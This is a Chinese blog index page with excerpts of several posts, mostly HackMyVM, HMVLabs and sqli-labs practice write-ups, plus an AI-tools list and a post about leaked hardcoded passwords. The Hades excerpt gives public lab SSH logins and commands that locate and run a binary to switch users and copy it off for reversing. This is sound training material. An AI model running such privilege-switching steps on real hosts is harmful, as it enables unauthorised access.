    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/04/09/hmv-challenge-72/" class="post-title-link" itemprop="url">HMV Challenge 72</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-04-09 08:29:08" itemprop="dateCreated datePublished" datetime="2024-04-09T08:29:08+08:00">2024-04-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-18 13:21:38" itemprop="dateModified" datetime="2024-04-18T13:21:38+08:00">2024-04-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="启动"><a href="#启动" class="headerlink" title="启动"></a>启动</h1><p>看下 ReadMe.md 里面有了几个要执行的命令:</p>
<ol>
<li>安装 Docker</li>
<li><code>docker build -t fr1end .</code> </li>
<li><code>docker run --name=fr1end -p1337:80 -p4000:4000 fr1end</code></li>
</ol>
<p>这样在宿主机的1337和4000 端口就启动了，这里提醒下不要改端口，系统写死了访问路径，改了之后跑起来有问题。<br>其实我还习惯加一下 -rm （运行完自己清理） -d（不用占着一个终端，不过要自己 stop），变成：<br><code>docker run --rm --name=fr1end -p1337:80 -p4000:4000 -d fr1end</code></p>
<p>除了自己折腾，题目也有.&#x2F;build_docker.sh 把刚才的命令打包了。直接执行也行。</p>
<p>玩好了也有对应的清理命令：</p>
<ol>
<li><code>docker rm fr1end -f</code> 删容器，如果加了–rm 就不用执行这一步。</li>
<li><code>docker rmi fr1end</code> 删镜像</li>
</ol>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/04/09/hmv-challenge-72/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/" class="post-title-link" itemprop="url">sqli-lab 复盘</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-20 12:20:05" itemprop="dateCreated datePublished" datetime="2024-02-20T12:20:05+08:00">2024-02-20</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:06" itemprop="dateModified" datetime="2024-04-09T08:35:06+08:00">2024-04-09</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="0x00-Docker-中安装"><a href="#0x00-Docker-中安装" class="headerlink" title="0x00 Docker 中安装"></a>0x00 Docker 中安装</h1><p>在 Mac 上，推荐使用 OrbStack.速度更快。<br>检查 docker 命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker -v</span><br></pre></td></tr></table></figure>

<p>搜索 sqli-lab 镜像, 选择一个合适的镜像后下载。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker search sqli-lab</span><br><span class="line">docker pull c0ny1/sqli-labs</span><br></pre></td></tr></table></figure>

<p>注意这个仓库没有默认的:lastest 标签，所以需要指定版本号。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">docker pull c0ny1/sqli-labs:0.1</span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/20/sqli-lab-%E5%A4%8D%E7%9B%98/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/" class="post-title-link" itemprop="url">HMVLabs Chapter 2: Hades</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-08 13:36:59" itemprop="dateCreated datePublished" datetime="2024-02-08T13:36:59+08:00">2024-02-08</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:39" itemprop="dateModified" datetime="2024-04-09T08:35:39+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="MISSION-0x01"><a href="#MISSION-0x01" class="headerlink" title="MISSION 0x01"></a>MISSION 0x01</h1><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Host: hades.hackmyvm.eu</span></span><br><span class="line"><span class="comment"># Port: 6666</span></span><br><span class="line"><span class="comment"># User: hacker</span></span><br><span class="line"><span class="comment"># Pass: begood!</span></span><br><span class="line"></span><br><span class="line">ssh hacker@hades.hackmyvm.eu -p 6666</span><br><span class="line"><span class="built_in">cat</span> readme.txt</span><br><span class="line"><span class="built_in">cat</span> mission.txt</span><br><span class="line"><span class="comment"># User acantha has left us a gift to obtain her powers.</span></span><br><span class="line"><span class="comment"># 找一下gift</span></span><br><span class="line">find / -name *gift* 2&gt;/dev/null</span><br><span class="line"><span class="comment"># 找到 /opt/gift_hacker</span></span><br><span class="line">file /opt/gift_hacker</span><br><span class="line"><span class="comment"># -bash: file: command not found</span></span><br><span class="line"><span class="comment"># 竟然没有file命令</span></span><br><span class="line"><span class="comment"># 试试strings</span></span><br><span class="line">strings /opt/gift_hacker</span><br><span class="line"><span class="comment"># 看起来是一个二进制文件，应该需要执行</span></span><br><span class="line"><span class="comment"># 执行之后竟然是一个shell</span></span><br><span class="line"><span class="comment"># bash: you: command not found</span></span><br><span class="line"><span class="comment"># acantha@hades:~$</span></span><br><span class="line"><span class="built_in">id</span></span><br><span class="line"><span class="comment"># uid=2043(acantha) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="comment"># 之前是 uid=2001(hacker) gid=2001(hacker) groups=2001(hacker)</span></span><br><span class="line"><span class="built_in">ls</span> -al /pwned/acantha</span><br><span class="line"><span class="comment"># 没权限，先逆向下刚才的  /opt/gift_hacker 文件</span></span><br><span class="line">scp -P 6666 hacker@hades.hackmyvm.eu:/opt/gift_hacker .</span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/08/hmv-HMVLabs-Chapter-2-Hades/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/" class="post-title-link" itemprop="url">复盘HMVLabs Chapter 1: Venus</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-07 16:05:21" itemprop="dateCreated datePublished" datetime="2024-02-07T16:05:21+08:00">2024-02-07</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:35:24" itemprop="dateModified" datetime="2024-04-09T08:35:24+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="MISSION-0x01"><a href="#MISSION-0x01" class="headerlink" title="MISSION 0x01"></a>MISSION 0x01</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Host: venus.hackmyvm.eu</span><br><span class="line">Port: 5000</span><br><span class="line">User: hacker</span><br><span class="line">Pass: havefun!</span><br></pre></td></tr></table></figure>

<p><code>ssh hacker@venus.hackmyvm.eu -p 5000</code> 登陆后，进入 Mission 1 ：<br>还有一个 readme.txt 可以先看看</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span>  mission.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># User sophia has saved her password in a hidden file in this folder. Find it and log in as sophia.</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/07/hmv-%E5%A4%8D%E7%9B%98HMVLabs-Chapter-1-Venus/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/" class="post-title-link" itemprop="url">复盘HackMyVM challenges docker 059</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2024-02-04 13:16:13" itemprop="dateCreated datePublished" datetime="2024-02-04T13:16:13+08:00">2024-02-04</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:36:30" itemprop="dateModified" datetime="2024-04-09T08:36:30+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E5%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶场</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>题目就一句话： Instructions in README.md inside the file.<br>然后给了个下载链接，下载下来是一个压缩包，解压后是源码、Dockerfile、README.md等文件。</p>
<p>先看 README 中几个地方比较关键：</p>
<ol>
<li>这是一个开源的 Blog 系统，代码地址 <a target="_blank" rel="noopener" href="https://github.com/MegaTKC/AeroCMS">https://github.com/MegaTKC/AeroCMS</a></li>
<li>有个字段动启动脚本： <code>./build_docker.sh</code> 里面其实就是：<ol>
<li><code>docker build -t h1ker .</code></li>
<li><code>docker run --name=h1ker -d -p 1337:80 h1ker</code></li>
</ol>
</li>
<li>最后如何清理。</li>
</ol>
<p>执行 <code>./build_docker.sh</code> 后，访问 <code>http://localhost:1337/</code> 就能看到一个博客系统了。</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2024/02/04/hmv-%E5%A4%8D%E7%9B%98HackMyVM-challenges-docker-059/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/" class="post-title-link" itemprop="url">整理工作中可能用到的 ai 工具</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-06-02 16:54:11" itemprop="dateCreated datePublished" datetime="2023-06-02T16:54:11+08:00">2023-06-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2023-06-29 08:50:16" itemprop="dateModified" datetime="2023-06-29T08:50:16+08:00">2023-06-29</time>
              </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <h1 id="大模型对话："><a href="#大模型对话：" class="headerlink" title="大模型对话："></a><strong>大模型对话：</strong></h1><p>国内可以的ChatGPT和类似工具：</p>
<h2 id="ChatGPT镜像："><a href="#ChatGPT镜像：" class="headerlink" title="ChatGPT镜像："></a><strong>ChatGPT镜像：</strong></h2><p><a target="_blank" rel="noopener" href="https://easeai.co/">easeai.co</a></p>
<p><a target="_blank" rel="noopener" href="https://chat3.jinshutuan.com/">AIchatOS</a></p>
<p><a target="_blank" rel="noopener" href="https://chat-shared1.zhile.io/shared.html">Shared Chat (zhile.io)</a> </p>
<p>国内无法使用的ChatGPT：</p>
<p><a target="_blank" rel="noopener" href="https://chat.forefront.ai/">Forefront Chat</a> 可以免费用GPT-4，高峰期会卡</p>
<p><a target="_blank" rel="noopener" href="https://poe.com/ChatGPT">POE</a> 包含 Sage、GPT-4（每日一次）、Claude等</p>
<p><a target="_blank" rel="noopener" href="https://www.bing.com/search?q=Bing+AI&showconv=1&FORM=hpcodx">Bing AI - 搜索</a> </p>
<h2 id="Bard"><a href="#Bard" class="headerlink" title="Bard:"></a><strong>Bard:</strong></h2><p><a target="_blank" rel="noopener" href="https://bard.google.com/?hl=en">Meet Bard (google.com)</a></p>
<h2 id="文心一言："><a href="#文心一言：" class="headerlink" title="文心一言："></a><strong>文心一言：</strong></h2><p><a target="_blank" rel="noopener" href="https://yiyan.baidu.com/">文心一言</a></p>
<h2 id="星火大模型："><a href="#星火大模型：" class="headerlink" title="星火大模型："></a><strong>星火大模型：</strong></h2><p><a target="_blank" rel="noopener" href="https://xinghuo.xfyun.cn/desk">讯飞星火认知大模型</a></p>
<h2 id="通义千问："><a href="#通义千问：" class="headerlink" title="通义千问："></a><strong>通义千问：</strong></h2><p><a target="_blank" rel="noopener" href="https://tongyi.aliyun.com/">通义千问</a></p>
<h2 id="vscode-插件"><a href="#vscode-插件" class="headerlink" title="vscode 插件:"></a><strong>vscode 插件:</strong></h2><p><a target="_blank" rel="noopener" href="https://marketplace.visualstudio.com/items?itemName=genieai.chatgpt-vscode">        ChatGPT - Genie AI - Visual Studio Marketplace    </a>  </p>
<p>国内可用,需要 API Key</p>
<h2 id="浏览器插件"><a href="#浏览器插件" class="headerlink" title="浏览器插件:"></a><strong>浏览器插件:</strong></h2><p><a target="_blank" rel="noopener" href="https://www.zipzap.ai/">ZipZap是一款由ChatGPT驱动的免费AI助理，可随时从您的浏览器角落唤起。</a>  </p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2023/06/02/%E6%95%B4%E7%90%86%E5%B7%A5%E4%BD%9C%E4%B8%AD%E5%8F%AF%E8%83%BD%E7%94%A8%E5%88%B0%E7%9A%84-ai-%E5%B7%A5%E5%85%B7/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  

      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://ghostlitao.gitee.io/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
      <meta itemprop="name" content="Todd">
      <meta itemprop="description" content="把生命浪费在美好的实物上">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="去找Todd">
    </span>
      <header class="post-header">
        <h2 class="post-title" itemprop="name headline">
          
            <a href="/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/" class="post-title-link" itemprop="url">软件公司的安全建设</a>
        </h2>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2023-05-12 14:35:55" itemprop="dateCreated datePublished" datetime="2023-05-12T14:35:55+08:00">2023-05-12</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2024-04-09 08:34:53" itemprop="dateModified" datetime="2024-04-09T08:34:53+08:00">2024-04-09</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E7%9E%8E%E5%86%99/" itemprop="url" rel="index"><span itemprop="name">瞎写</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
          <p>最近公司同事做了件离谱的事，把给客户公司写的软件源代码放到GitHub上开源了。<br>要说光是软件源代码，对这件事儿说也不算太大，因为是他自己负责的一个小项目，本身也没太大的商业价值，只能说公司的项目随便开源了，一个招呼都不打，意识不行吧。<br>最大的问题是，里面他硬编码了密码到配置文件里，配置文件也给上传了，客户最近几天在做PT，一下窟窿就捅大了。</p>
<p>现在客户让我拿出来解决方案，以及保障后续不会出现类似情况。<br>我想了想，这件事儿的问题应该包括以下几个方面：</p>
          <!--noindex-->
            <div class="post-button">
              <a class="btn" href="/2023/05/12/%E8%BD%AF%E4%BB%B6%E5%85%AC%E5%8F%B8%E7%9A%84%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%BE/#more" rel="contents">
                阅读全文 &raquo;
              </a>
            </div>
          <!--/noindex-->
        
      
    </div>

    
    
    
      <footer class="post-footer">
        <div class="post-eof"></div>
      </footer>
  </article>
  
  
  


  
  <nav class="pagination">
    <span class="page-number current">1</span><a class="page-number" href="/page/2/">2</a><span class="space">&hellip;</span><a class="page-number" href="/page/4/">4</a><a class="extend next" rel="next" href="/page/2/"><i class="fa fa-angle-right" aria-label="下一页"></i></a>
  </nav>



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Todd"
      src="https://mp-b6a394ba-6e60-4cdf-941a-67c55476595e.cdn.bspapp.com/cloudstorage/43eb35ef-1aed-4d61-9ebb-a777fa49e70a.">
  <p class="site-author-name" itemprop="name">Todd</p>
  <div class="site-description" itemprop="description">把生命浪费在美好的实物上</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/ghostlitao" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;ghostlitao" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2019 – 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Todd</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
